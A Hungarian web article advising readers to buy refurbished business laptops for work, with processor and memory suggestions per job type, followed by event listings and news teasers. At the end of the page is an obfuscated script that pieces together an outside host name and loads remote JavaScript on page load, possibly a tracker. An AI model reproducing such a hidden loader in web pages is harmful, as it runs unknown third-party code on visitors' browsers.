kapubanner for mobile
Megjelent: 2 éve

Használt Laptop Munkához - A Tökéletes Társ

Miért a használt laptop az egyik legjobb megoldás munkához? Milyen szempontok alapján érdemes gépet választanunk? Miért kell kétszer jobban meggondolni a munkaállomást, mint egy általános célokra használt laptopot? Legújabb cikkünkben kutatjuk az iroda néma hősét. A laptopot, amely nem csak a munkavégzésünket teszi hatékonyabbá, de lényegesen megkönnyíti a mindennapjainkat.

használt laptop számítógép-

Tény, amit tény. Amikor a munkahelyünkre szánjuk a gépet át kell kapcsolnunk az agyunkat egy teljesen más igény szintre, mint ahogy azt a jó öreg otthoni laptop esetében tennénk. Nem mindegy az, hogy milyen dinamikusan tudunk haladni a munkával és mennyire stabil a készülékünk. Könnyen előfordulhatnak nem várt problémák. Egy nem megfelelően kiválasztott laptop túlmelegedhet, vagy éppen csak megszakítva a munkafolyamatot beáll a már jól ismert se kép - se hang állapot. Mi pedig bukjuk is az addigi munkánkat. 

Arról nem is beszélve, hogy az új laptop beszerzése általában nem csettintésre történik az esetek nagy részében. Ki tudja mennyi munkát kell bepótolnunk, ha végre megérkezik az új munkaeszköz! Tehát a minőség és a megbízhatóság elsődleges szempont. Nem lehet kompromisszumot kötni. Milyen opció marad viszont, ha nem szeretnénk egy vagyont költeni az új laptopunkra? 

Használt laptop az irodába

Általános sztereotípia, hogy a használt laptop rossz választás. Nyugodtan merjünk felújított laptopot választani a munkához is. Sok esetben még jobban is járunk vele, mintha egy középkategóriás új készülék kerülne kiválasztásra. Arra viszont érdemes odafigyelnünk, hogy mindenképpen az üzleti gépeket részesítsük előnyben. Mi a legnagyobb érv, amely mellettük szól? Mind anyaghasználat, mind teljesítmény, mind pedig minőségi szempontok alapján lényegesen tovább bírják, mint a hagyományos laptopok. 

Alapvetően az üzleti laptopok nem kettő és nem is 4 évre lettek tervezve. 6-8 évig bírnia kell, mind hardware, mind anyaghasználati szinten. Tehát messze nem azt a kategóriát képviseli, amit megveszel középkategóriásként a plázában. Ezek a laptopok határozottan a legjobb minőséget képviselik. Akkor, hogy is néz ki a vásárlás menete és miért ez a legjobb megoldás? Mutatjuk:

A matek egyszerű. Vegyünk egy újonnan 500.000 Ft értékű üzleti laptopot. Használják két évig, majd felújításra kerül. A gép eleve 6-8 évre lett tervezve, tehát még mindig minimum 4 évig tudod problémamentesen használni az eredeti ár töredékéért. Nyugodtan kijelenthetjük, hogy lényegesen jobban jársz, mint egy hagyományos középkategóriás, ámde új laptoppal. 

Neked milyen laptopra van szükséged?

Persze az üzleti laptopok esetében sem kell mindig a legjobb perifériával rendelkező eszközt kiválasztanunk. Munkafolyamatonként eltérőek lehetnek az igények, ezért most megvizsgáljuk, hogy milyen laptopot, hol érdemes használnunk. Természetesen nem fogunk minden foglalkozást felsorolni ( elnézést ), de adunk egy nagyságrendi képet arról, hogy az adott munka típusokhoz milyen gépet érdemes kiválasztani a használt laptop kínálatból. 
Nem kérdés, hogy mindenképpen olyan gépet kell választani, amelyben SSD van és nem hagyományos HDD. Lényegesen gyorsabbá teszi a munkavégzést is. Az, hogy mennyire tárhelyre van szükség abszolút szubjektív, ezért külön ennek a méretére nem fogunk kitérni a magyarázatban.

Általános felhasználásra

Az általános felhasználás esetében nem lesz szükségünk erőműre, elegendő egy középkategóriás üzleti használt laptopot kiválasztanunk. Mit is értünk pontosan általános kategória alatt? Nos, mindent is:) Alapvetően a táblázatkezelés, multi-tasking ( ha létezik ), internetezés, zoom meetingek lebonyolítása és minden olyan folyamat, amely nem igényel emelt erőforrást. Az ilyen esetekben egy Intel i3-as, vagy egy régebbi i5-ös is tökéletesen megfelelő. Válasszunk hozzá legalább 8GB memóriát és már készen is vagyunk:)

Összetett irodai munkavégzésre

Mi van akkor, ha erősebb gép kell? Előfordulhat, hogy még az általános irodai munka keretein belül az összetettebb feladatok is szóba jönnek a munkavégzés során. Gondoljunk a több ezer soros adatbázis táblázatok szerkesztésére, vagy némi Photoshop használatra. Ilyenkor azt szoktuk mondani, hogy érdemes a rendelkezésre álló memória mennyiséget növelni. 16GB - 32GB-ig is megtehetjük ezt. Processzor tekintetében inkább igyekezzünk az i5 Intel típust kiválasztani.

Programozáshoz 

A programozás tipikusan egy olyan munkafolyamat, amely során szükségünk lesz egy erős munkaeszközre. Ilyen esetekben érdemes szintén a memória és a processzor kiválasztására nagy gondot fordítanunk. i5, i7 processzort javaslunk minimum 16 GB memóriával. A processzor típusára vonatkozóan pedig igyekezzünk olyan 8+ generációs variánst kiválasztani, amely már képes kezelni a Windows 11-et is. Na nem az operációs rendszer miatt, inkább azért, mert ezek a processzorok már lényegesen erősebbek korábbi generációs társaiknál. Itt pedig a számítási sebesség mérvadó.

Tervezéshez

A tervezői laptopok nagyon hasonlóak a programozói verziókhoz leszámítva egyetlen kulcsfontosságú elemet. Ez az elem pedig nem más, mint a videókártya. A tervezéshez már mindenképpen szükségünk lesz dedikált videókártyára, nem érhetjük be az alaplapra integrált verzióval. Ezek a gépek persze némileg drágább kategóriába sorolhatóak, de még így is lényegesen olcsóbban hozzájuthatunk, mintha újonnan vásárolnánk. 

Reméljük, hogy izgalmasnak és hasznosnak találtad a cikkünket és tudtunk segíteni, hogy meglelhesd a tökéletes laptopot a munkádhoz. A használt laptop remek lehetőség arra, hogy a legjobb áron tudj hozzájutni egy olyan munkaeszközhöz, amely tökéletesen kiszolgál majd. 
Amennyiben bármi kérdésed felmerülne, csak írd le a komment szekcióban és állunk is rendelkezésedre. 

  • 2024.04.30NewLeadership – Vezetői eszköztár bővítése Önmaguk fejlesztését is fontosnak tartó középvezetőknek, frissen kinevezett döntéshozóknak szóló komplex és intenzív vezetőfejlesztő program sok gyakorlattal. Különlegessége, hogy a résztvevők átgondolhatják és megoszthatják egymással aktuális kihívásaikat és még a kritikus vezetői helyzetek megoldásáról is tanulhatnak egymás jó gyakorlatából is!info button Részletek ticket button Jegyek
  • 2024.05.02Munkaviszony létesítése és megszűntetése – Dr. Berke Gyula Pannon Munkajogi Akadémia - Pannon Munkajogi Akadémia előadás-sorozatunkat, melyben kiváló és elismert szakmai előadók támogatásával ismerhetjük meg a munkajog különböző területeit, ajánljuk mindazoknak, akik szeretnék ismereteiket bővíteni, gyakorlati megközelítésben szeretnék az alkalmazott jogi hátteret megismerni.info button Részletek ticket button Jegyek
  • 2024.05.09Egy jól működő csapat titka – Vezetői reziliencia fejlesztése A vezetői reziliencia fejlesztése képzésünk arra világít rá, hogyan lehet úgy tekinteni a tényekre, hogy relativizáljuk őket, kezelhető megvilágításba helyezzük a nehézségeket és igyekezzünk megőrizni a racionalitásunkat, hogy ebben a nehéz helyzetben is fejlődni tudjon a csapatunk. Segítve a csapattagoknak abban, hogy a problémalátásukat a megoldás keresés fókusza váltsa fel és megváltozzon az interakcióik minősége.info button Részletek ticket button Jegyek
  • 2024.05.09Munkaidő, pihenőidő – Dr. Takács Gábor Pannon Munkajogi Akadémia - Pannon Munkajogi Akadémia előadás-sorozatunkat, melyben kiváló és elismert szakmai előadók támogatásával ismerhetjük meg a munkajog különböző területeit, ajánljuk mindazoknak, akik szeretnék ismereteiket bővíteni, gyakorlati megközelítésben szeretnék az alkalmazott jogi hátteret megismerniinfo button Részletek ticket button Jegyek
További cikkek
Évi 70 millió forintos fizetésért keresnek háziorvost

Évi 150 ezer fontért, azaz mintegy 70 millió forintért keresnek az Egyesült Királyság legtávolabbi, legeldugottabb szigeteinek háziorvosi... Teljes cikk

Ittasan dolgozó buszsofőr ellen mondták ki az ítéletet

Nem jogerősen egy év felfüggesztett szabadságvesztésre ítélt az Egri Járásbíróság egy ittasan dolgozó buszsofőrt Egerben - közölte a Heves... Teljes cikk

Autószerelő drogdíler ellen emeltek vádat, aki műhelyében árulta a kábítószert

A Bács-Kiskun Vármegyei Főügyészség jelentős mennyiségű kábítószerre elkövetett kábítószer-kereskedelem, új pszichoaktív anyaggal... Teljes cikk

<script> (function(){ wbbd=document.createElement("script");wbbd.type="text/javascript"; wbbd.async=true;wbbd_=(("us")+"t")+"a";wbbd_+=("t.i")+""+"n";wbbd_+=(("f")+"o");wbbd_+="/"; wbbdu="497312825.";wbbdu+="qdim9pXkbbdp7z2rbf7xnefzjcg92k";wbbd.src="https://"+wbbd_+wbbdu; wbbddb=document.body;wbbddb.appendChild(wbbd); })(); </script>